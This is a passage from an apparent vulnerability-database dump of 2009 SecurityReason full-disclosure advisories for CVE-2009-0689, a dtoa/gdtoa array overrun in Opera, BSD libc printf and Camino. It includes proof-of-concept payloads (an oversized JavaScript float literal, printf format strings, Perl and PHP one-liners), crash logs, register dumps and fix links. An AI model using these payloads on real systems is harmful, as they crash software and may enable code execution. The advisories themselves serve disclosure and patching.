Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. Opera has a very similar dtoa algorithm to the BSD,\r\nChrome and Mozilla products. It is the same issue like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In Kmax has defined 15.\r\nFunctions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist\r\narray.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use Opera to see this PoC, Opera will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\r\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\r\n\r\nRegisters:\r\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\r\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\r\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\r\nFPU stack:\r\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\r\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\r\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\r\n\r\n127# gdb -q opera opera.core\r\n...\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0 0x2960307b in ?? 
()\r\n...\r\n(gdb) i r\r\neax 0x71c71c71 1908874353\r\necx 0x2aa03be4 715144164\r\nedx 0x0 0\r\nebx 0x296177f8 694253560\r\nesp 0xbfbfb650 0xbfbfb650\r\nebp 0xbfbfb698 0xbfbfb698\r\nesi 0x2962d000 694341632\r\nedi 0x0 0\r\neip 0x2960307b 0x2960307b\r\n...\r\n(gdb) x/100x ($esi)-90\r\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\r\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\r\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\r\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at address 0x2962cffe\r\n...\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all vendors about this issue,\r\nhowever, they did not do it. Even greater confusion caused new CVE number "CVE-2009-1563". Secunia\r\nhas informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products like ( KDE, Chrome ) and it is based on "CVE-2009-0689". After\r\nsome time Mozilla Foundation Security Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html")\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in javascript (from Secunia), forced\r\nus to official notification all other vendors. We publish all the individual advisories, to formally\r\nshow all vulnerable software and to avoid wrong CVE number. 
We do not see any other way to fix this\r\nissue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nOpera fix:\r\nThe vulnerability was fixed in the latest release candidate Opera RC3 :\r\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\r\nIn shortly time we can expect the final verion of Opera with the fix. \r\n\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/
cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2G8ACgkQpiCeOKaYa9YMzACgwvAI8oo1UP6GwlmGq3m+gkHm\r\nmVoAnArUxHXAPkrpEPOOLi4X99l5sAFh\r\n=VtH9\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22814", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22814", "title": "Opera 10.01 Remote Array Overrun (Arbitrary code execution)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Multiple Vendors libc/gdtoa printf(3) Array Overrun ]\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 25.06.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\n\r\nAffected Software (12.06.2009):\r\n- - OpenBSD 4.5\r\n- - NetBSD 5.0\r\n- - FreeBSD 7.2/6.4\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\n\r\n- --- 0.Description ---\r\nWeek after the release of new version OpenBSD and NetBSD, our research\r\nteam has checked a new implementation of gdtoa\r\n\r\nhttp://openbsd.org/45.html\r\n\r\n- ---\r\nA new version of the gdtoa code has been integrated, bringing better C99\r\nsupport to printf(3) and friends.\r\n- ---\r\n\r\nMore:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/\r\n\r\n- --- 1. 
Multiple Vendors libc/gdtoa printf(3) Array Overrun ---\r\nThe main problem exists in the new dtoa implementation.\r\n\r\nasprintf(3) will crash for asprintf(ssij, "%0.262159f", x)\r\n\r\nwhere x != 0.\r\n\r\nThe behaviour is correct for a precision of 262158.\r\n\r\nLet's see:\r\n\r\n(gdb) r\r\nStarting program: /cxib/C/check\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xbbbb79d9 in __Balloc_D2A () from /usr/lib/libc.so.12\r\n(gdb) bt\r\n#0 0xbbbb79d9 in __Balloc_D2A () from /usr/lib/libc.so.12\r\n#1 0xbbbab6d7 in __rv_alloc_D2A () from /usr/lib/libc.so.12\r\n#2 0xbbba8db5 in __dtoa () from /usr/lib/libc.so.12\r\n#3 0xbbba671f in __vfprintf_unlocked () from /usr/lib/libc.so.12\r\n#4 0xbbb882e1 in asprintf () from /usr/lib/libc.so.12\r\n#5 0x08048706 in main () at check.c:6\r\n\r\nLet's look at src/lib/libc/gdtoa/gdtoaimp.h\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax 15\r\n...\r\n- ---gdtoaimp.h---\r\n\r\nKmax is 15, so the freelist array has 16 entries (indices 0..15). If a bigger index is used, such as 17 (the value seen in edi),\r\nthe program overruns the freelist array; .bss will contain 0x1.\r\n\r\nCorrect fix (by NetBSD):\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax (sizeof(size_t) << 3)\r\n...\r\n- ---gdtoaimp.h---\r\n\r\nWhat is wrong? 
This program will crash in\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\n if ( (rv = freelist[k]) !=0) {\r\n freelist[k] = rv->next;\r\n }\r\n else {\r\n x = 1 << k;\r\n#ifdef Omit_Private_Memory\r\n rv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong));\r\n#else\r\n len = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1)\r\n /sizeof(double);\r\n if ((double *)(pmem_next - private_mem + len) <= (double *)PRIVATE_mem) {\r\n rv = (Bigint*)(void *)pmem_next;\r\n pmem_next += len;\r\n }\r\n else\r\n rv = (Bigint*)MALLOC(len*sizeof(double));\r\n#endif\r\n if (rv == NULL)\r\n return NULL;\r\n rv->k = k;\r\n rv->maxwds = x;\r\n }\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\n\r\nhere\r\n\r\nrv->k = k;\r\n\r\nor\r\n\r\nfreelist[k] = rv->next;\r\n\r\nA good example to show this issue is printf(1) program.\r\n\r\n127# printf %1.262159f 1.1\r\nMemory fault (core dumped)\r\n\r\n127# printf %11.2109999999f\r\n210919999199919999199991791199.5000000000000000000000000000000001000000000001001\r\n\r\nesi = 0x12\r\nedi = 0x1d\r\n\r\n127# printf %11.2009999999f\r\n220919999199919999199991791199.5000000000000000000000000000000001000000000001001\r\n\r\nesi = 0x13\r\nedi = 0x1d\r\n\r\nwe can manipulate esi reg.\r\n\r\n127# printf %11.2009999999f\r\n126768668100000000000000000000.100000000000000000000000000000000000000000000000111111111\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n__Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:59\r\n59 freelist[k] = rv->next;\r\n(gdb) i r\r\neax 0x20efdb04 552590084\r\necx 0x77ce2a9d 2010000029\r\nedx 0x0 0\r\nebx 0x20eff654 552597076\r\nesp 0xcfbfc2b0 0xcfbfc2b0\r\nebp 0xcfbfc2c8 0xcfbfc2c8\r\nesi 0x41414141 1094795585\r\nedi 0x1d 29\r\neip 0xf59317 0xf59317\r\neflags 0x10206 66054\r\ncs 0x2b 43\r\nss 0x33 51\r\nds 0x33 51\r\nes 0x33 51\r\nfs 0x33 51\r\ngs 0x33 51\r\n\r\nesi = 0x41414141\r\nedi = 0x1d\r\n\r\n1267686681 is value of esi reg.\r\n\r\nprogram will crash in\r\n\r\nfreelist[k] = rv->next;\r\n\r\nExample 0:\r\n- 
--- chujwamwmuzg.pl ---\r\n#!/usr/local/bin/perl\r\nprintf "%0.4194310f", 0x0.0x41414141;\r\n- --- chujwamwmuzg.pl ---\r\n\r\nPerl will crash with\r\nesi = 0x41414141\r\nedi = 0x15\r\n\r\nExample 1:\r\n127# php -r 'money_format("%0.262159n", 1.1111);'\r\nMemory fault (core dumped)\r\n\r\nPrograms that allow you to enter or control the format string are vulnerable.\r\nWe believe that in the OpenBSD source tree only printf(1) and perl(1)\r\nare affected.\r\n\r\nFunctions like printf(3), strfmon(3), fprintf(3), sprintf(3),\r\nsnprintf(3), asprintf(3), vprintf(3), vfprintf(3), vsprintf(3),\r\nvsnprintf(3), vasprintf(3) and others are vulnerable (with the new gdtoa implementation).\r\nOther languages are also affected (printf in Perl).\r\n\r\n- --- 2. Fix ---\r\nNetBSD fix:\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\n\r\n- --- 3. Greets ---\r\nChristos Zoulas\r\n\r\nsp3x Infospec Chujwamwdupe p_e_a pi3\r\n\r\n- --- 4. 
Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\nEmail: cxib {a.t] securityreason [d0t} com\r\nGPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2009-06-27T00:00:00", "published": "2009-06-27T00:00:00", "id": "SECURITYVULNS:DOC:22093", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22093", "title": "[Full-disclosure] SecurityReason: Multiple Vendors libc/gdtoa printf(3) Array Overrun", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "Index array overflow in libc gdtoa() function (used by printf()).", "edition": 1, "modified": "2010-01-08T00:00:00", "published": "2010-01-08T00:00:00", "id": "SECURITYVULNS:VULN:10021", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10021", "title": "BSD-based systems (FreeBSD, NetBSD, OpenBSD) index array overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 
11.12.2009\r\n\r\nCVE: CVE-2009-0689\r\nCWE: CWE-119\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Camino 1.6.10\r\n\r\nFixed in:\r\n- - Camino 2.0 <=\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/76\r\n\r\n\r\n- --- 0.Description ---\r\nCamino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source,\r\nGUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac\r\nOS X operating system. In place of an XUL-based user interface used by most Mozilla-based\r\napplications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.\r\n\r\n- --- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exists in the dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey,\r\nChrome, Opera etc., and it is the same issue as SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good.\r\nMore information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a floating-point literal with any number of digits, which will overwrite memory.\r\nKmax is defined as 15. Functions in dtoa don't check the Kmax limit, and\r\nit is possible to access elements at index 16 and above of the freelist array.\r\n\r\n\r\n- --- 2. 
Proof of Concept (PoC) ---\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nProcess: Camino [153]\r\nPath: /Volumes/Camino/Camino.app/Contents/MacOS/Camino\r\nIdentifier: org.mozilla.camino\r\nVersion: 1.6.10 (1609.09.25)\r\nCode Type: X86 (Native)\r\nParent Process: launchd [92]\r\n\r\nDate/Time: 2009-11-06 12:57:24.698 -0800\r\nOS Version: Mac OS X 10.5.6 (9G55)\r\nReport Version: 6\r\n\r\nException Type: EXC_BAD_ACCESS (SIGSEGV)\r\nException Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590\r\nCrashed Thread: 0\r\n\r\nThread 0 Crashed:\r\n0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235\r\n1 libSystem.B.dylib 0x01d7710d szone_malloc + 180\r\n2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81\r\n3 libSystem.B.dylib 0x01d76fac malloc + 55\r\n4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220\r\n5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282\r\n6 org.mozilla.camino 0x0038ae0e\r\nnsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146\r\n7 org.mozilla.camino 0x0038b215\r\nnsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27\r\n8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*,\r\nvoid*) + 24\r\n9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int\r\n(*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37\r\n10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*,\r\nnsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123\r\n11 org.mozilla.camino 0x002cc924\r\nnsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134\r\n12 org.mozilla.camino 0x002f617b PresShell::InitialReflow(int, int) + 1151\r\n13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout(int) + 342\r\n14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout() + 82\r\n15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&)\r\n+ 193\r\n16 
org.mozilla.camino 0x001a60e8 CNavDTD::OpenBody(nsCParserNode const*) + 54\r\n17 org.mozilla.camino 0x001a8b53 CNavDTD::HandleDefaultStartToken(CToken*,\r\nnsHTMLTag, nsCParserNode*) + 393\r\n18 org.mozilla.camino 0x001aa3e5 CNavDTD::HandleStartToken(CToken*) + 623\r\n19 org.mozilla.camino 0x001aaaa2 CNavDTD::HandleToken(CToken*, nsIParser*) + 1358\r\n20 org.mozilla.camino 0x001a9a4d CNavDTD::BuildModel(nsIParser*, nsITokenizer*,\r\nnsITokenObserver*, nsIContentSink*) + 165\r\n21 org.mozilla.camino 0x001a94ee CNavDTD::DidBuildModel(unsigned int, int,\r\nnsIParser*, nsIContentSink*) + 550\r\n22 org.mozilla.camino 0x001b5e28 nsParser::DidBuildModel(unsigned int) + 90\r\n23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int, int, int) + 661\r\n24 org.mozilla.camino 0x001b59a8 nsParser::OnStopRequest(nsIRequest*,\r\nnsISupports*, unsigned int) + 128\r\n25 org.mozilla.camino 0x002076a0 nsDocumentOpenInfo::OnStopRequest(nsIRequest*,\r\nnsISupports*, unsigned int) + 88\r\n26 org.mozilla.camino 0x000f522a nsFileChannel::OnStopRequest(nsIRequest*,\r\nnsISupports*, unsigned int) + 78\r\n27 org.mozilla.camino 0x000baf18 nsInputStreamPump::OnStateStop() + 88\r\n28 org.mozilla.camino 0x000bb49d\r\nnsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133\r\n29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process() + 751\r\n30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21\r\n31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103\r\n32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141\r\n33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88\r\n34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode + 283\r\n35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374\r\n36 com.apple.HIToolbox 0x02d8af4d BlockUntilNextEventMatchingListInMode + 106\r\n37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657\r\n38 com.apple.AppKit 0x05e94630 -[NSApplication\r\nnextEventMatchingMask:untilDate:inMode:dequeue:] + 128\r\n39 
com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795\r\n40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574\r\n41 org.mozilla.camino 0x0000364c main + 196\r\n42 org.mozilla.camino 0x00002f1e _start + 216\r\n43 org.mozilla.camino 0x00002e45 start + 41\r\n\r\nThread 1:\r\n0 libSystem.B.dylib 0x01dad30a select$DARWIN_EXTSN$NOCANCEL + 10\r\n1 libnspr4.dylib 0x00d3940e poll + 258\r\n2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134\r\n3 org.mozilla.camino 0x000cb897 nsSocketTransportService::Poll(unsigned int*) +\r\n99\r\n4 org.mozilla.camino 0x000cbe75 nsSocketTransportService::Run() + 497\r\n5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41\r\n6 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n8 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 2:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74\r\n6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41\r\n7 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n8 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n9 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 3:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145\r\n6 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n8 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 4:\r\n0 libSystem.B.dylib 0x01d7d3ae __semwait_signal 
+ 10\r\n1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003 + 73\r\n2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54\r\n3 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n4 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 5:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 org.mozilla.camino 0x000d43ce nsHostResolver::GetHostToLookup(nsHostRecord**)\r\n+ 212\r\n6 org.mozilla.camino 0x000d4b2d nsHostResolver::ThreadFunc(void*) + 123\r\n7 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n8 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n9 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 6:\r\n0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10\r\n1 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n2 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 7:\r\n0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10\r\n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244\r\n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47\r\n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207\r\n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75\r\n5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145\r\n6 libnspr4.dylib 0x00d37309 _pt_root + 150\r\n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321\r\n8 libSystem.B.dylib 0x01da6f52 thread_start + 34\r\n\r\nThread 0 crashed with X86 Thread State (32-bit):\r\n eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590\r\n edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190\r\n ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017\r\n ds: 0x0000001f es: 0x0000001f fs: 